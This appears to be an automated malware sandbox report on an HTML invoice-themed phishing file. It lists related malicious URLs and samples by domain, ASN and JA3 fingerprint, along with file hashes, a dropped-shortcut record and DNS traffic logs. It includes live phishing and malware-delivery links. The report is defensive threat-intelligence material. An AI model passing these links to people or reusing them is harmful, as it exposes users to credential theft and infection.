s-part-0035.t-0009.t-msedge.net	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	13.107.246.63
	pjthjsdjgjrtavv.exe	Get hash	malicious	Vidar	Browse	13.107.246.63
	Laurier Partners Proposal.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	13.107.246.63
	https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30	Get hash	malicious	Unknown	Browse	13.107.246.63
	1734647107dd7eab79078510a75c9c904ec20f028e4e5eeaf98868f69fdfb304d2c24675ce436.dat-decoded.exe	Get hash	malicious	XWorm	Browse	13.107.246.63
	17346471071098118b26fa2e7fe54471af2f31e15cc65aad0de660d0190f83c19fa638201a790.dat-decoded.exe	Get hash	malicious	Njrat	Browse	13.107.246.63
	1734647107a511924ae4323dadec335a6dd4daac1533c80e42a10385a9bac8294ee73069f5190.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	13.107.246.63
	1734647107cb5feb29beac8e7c2a4d2b204afcea8969eb9f4b139cbe2e61d9316e36a22099229.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	13.107.246.63
sni1gl.wpc.omegacdn.net	Eallentoff_401k_1484013830.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://nicholaspackaging.businesslawcloud.com/mTlFM	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	NieuwBetalingsbevestigingvoor vanas.eu.htm	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z	Get hash	malicious	Unknown	Browse	152.199.21.175
	doc55334.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharing	Get hash	malicious	Unknown	Browse	152.199.21.175
	http://office.yacivt.com/wriEcFSZ	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://alphaarchitect.com/2024/12/long-term-expected-returns/	Get hash	malicious	Unknown	Browse	104.19.229.21
	http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8p	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.12.88
	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	172.67.197.170
	https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznj	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.bacselearning.co.uk/learn/forgot-password	Get hash	malicious	Unknown	Browse	104.22.38.92
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse	172.66.0.227
CLOUDFLARENETUS	https://alphaarchitect.com/2024/12/long-term-expected-returns/	Get hash	malicious	Unknown	Browse	104.19.229.21
	http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8p	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.12.88
	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	172.67.197.170
	https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznj	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.bacselearning.co.uk/learn/forgot-password	Get hash	malicious	Unknown	Browse	104.22.38.92
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse	172.66.0.227
FASTLYUS	https://alphaarchitect.com/2024/12/long-term-expected-returns/	Get hash	malicious	Unknown	Browse	199.232.168.157
	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	185.199.108.153
	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse	199.232.168.157
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.199.110.133
	https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.com	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	Dec 2024_12192924_Image.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.com	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	23.1.237.91
	https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=true	Get hash	malicious	Unknown	Browse	23.1.237.91
	QhR8Zp6fZs.lnk	Get hash	malicious	RHADAMANTHYS	Browse	23.1.237.91
	CROC000400 .pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	UYJ0oreVew.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	L1SrJoDQvG.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z	Get hash	malicious	Unknown	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	23.1.237.91
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	23.1.237.91

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 11:46:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9792300868885224
Encrypted:	false
SSDEEP:	48:8qdIXTovq2HtidAKZdA19ehwiZUklqehJy+3:8zrgCy
MD5:	E7206311E8C9B7EAB8266E7E9E252C20
SHA1:	4D7E3149ADBE194D3D27DC46F71567BDF01A30B8
SHA-256:	C81D67D039D580B37B047B35EDC854B50A841AF74B5C200E8328A3F4CB2692D3
SHA-512:	8E0D79A2D236DCF94BEE9B4C20C641ADED70B3839AE7CEA10F613B21406ACFBE1E5907DB33DDBE1F51314F5C926FDF7EB16A62ECF92B5F52CF656F587792224A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......2.R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.e....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z/x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Entropy (8bit):	4.675851957481879
TrID:	HyperText Markup Language (15015/1) 20.56% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (11501/1) 15.75% HyperText Markup Language (11501/1) 15.75%
File name:	Invoice for 04-09-24 fede39.admr.org.html
File size:	12'362 bytes
MD5:	c88d4662a0a1d7d26db3ea7932ce0c33
SHA1:	ade5a862c04e71973237ed97a4e19acda2174096
SHA256:	bfba0d8b3a7238ca9ff16c92b87542a6ef5ed311bb074f6f35b20c01812bc22a
SHA512:	21afcf74ce8678f149b664e2f5693b17a94f7ad1752e8d59309985f170606405ae16237be57fd0ed6cf5219459a9dbe8f480ea0dbcb90473758074a4138ea70b
SSDEEP:	192:ChS/WjOpij4W6dPznbYJTPgrdYG5ALILTgKA8dATYTaqc26oHPTZe2:CYiO42DbCTMdYz0fgKA/cWqcboHPTZ3
TLSH:	C3426465635001621337C2D6B9B59B8DFF30024FE901524ABA7C0B8B3FF5D5A69A26D8
File Content Preview:	<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <link rel="icon".. data-savepage-href="https://aadcdn.msauth.net/shared/1.0/content/images/favi

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 13:46:31.880304098 CET	53936	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:31.880496025 CET	62790	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:31.881731987 CET	51959	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:31.881896973 CET	65284	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:31.882251024 CET	62509	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:31.882380962 CET	54822	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:32.015424967 CET	53	60692	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.016450882 CET	53	51227	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.020549059 CET	53	65284	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.096474886 CET	53	62790	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.115231991 CET	53	51959	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.138811111 CET	53	62509	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:32.396663904 CET	53	54822	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:33.773749113 CET	60728	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:33.773902893 CET	54413	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:33.911253929 CET	53	60728	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:34.054513931 CET	53	54413	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:34.503658056 CET	58083	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:34.503907919 CET	57619	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:34.641905069 CET	53	57619	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:34.641977072 CET	53	58083	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:34.821638107 CET	53	60036	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:35.980775118 CET	61283	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:35.980902910 CET	61341	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:36.118252039 CET	53	61341	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:36.124290943 CET	53	61283	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:36.412446022 CET	53	64382	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:36.514137030 CET	63501	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:36.514288902 CET	57126	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:36.651227951 CET	53	63501	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:36.652112007 CET	53	57126	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:47.996551991 CET	59787	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:47.997121096 CET	51763	53	192.168.2.5	1.1.1.1
Dec 20, 2024 13:46:48.134025097 CET	53	51763	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:48.135077000 CET	53	59787	1.1.1.1	192.168.2.5
Dec 20, 2024 13:46:51.921407938 CET	53	54915	1.1.1.1	192.168.2.5
Dec 20, 2024 13:47:10.772485971 CET	53	49965	1.1.1.1	192.168.2.5
Dec 20, 2024 13:47:31.508075953 CET	53	52949	1.1.1.1	192.168.2.5
Dec 20, 2024 13:47:33.529869080 CET	53	61996	1.1.1.1	192.168.2.5
Dec 20, 2024 13:48:03.413225889 CET	53	54127	1.1.1.1	192.168.2.5
Dec 20, 2024 13:48:47.769391060 CET	53	56512	1.1.1.1	192.168.2.5

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 20, 2024 13:46:32.096580029 CET	192.168.2.5	1.1.1.1	c246	(Port unreachable)	Destination Unreachable
Dec 20, 2024 13:46:34.054610968 CET	192.168.2.5	1.1.1.1	c24f	(Port unreachable)	Destination Unreachable

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 13:46:32.017215014 CET	1.1.1.1	192.168.2.5	0x53f7	No error (0)	cdn.jsdelivr.net	cdn.jsdelivr.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:32.020549059 CET	1.1.1.1	192.168.2.5	0xe0a	No error (0)	cdn.tailwindcss.com			65	IN (0x0001)	false
Dec 20, 2024 13:46:32.096474886 CET	1.1.1.1	192.168.2.5	0x452e	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:32.115231991 CET	1.1.1.1	192.168.2.5	0xdb98	No error (0)	cdn.tailwindcss.com		104.22.21.144	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:32.115231991 CET	1.1.1.1	192.168.2.5	0xdb98	No error (0)	cdn.tailwindcss.com		104.22.20.144	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:32.115231991 CET	1.1.1.1	192.168.2.5	0xdb98	No error (0)	cdn.tailwindcss.com		172.67.41.16	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:32.138811111 CET	1.1.1.1	192.168.2.5	0x6a5c	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
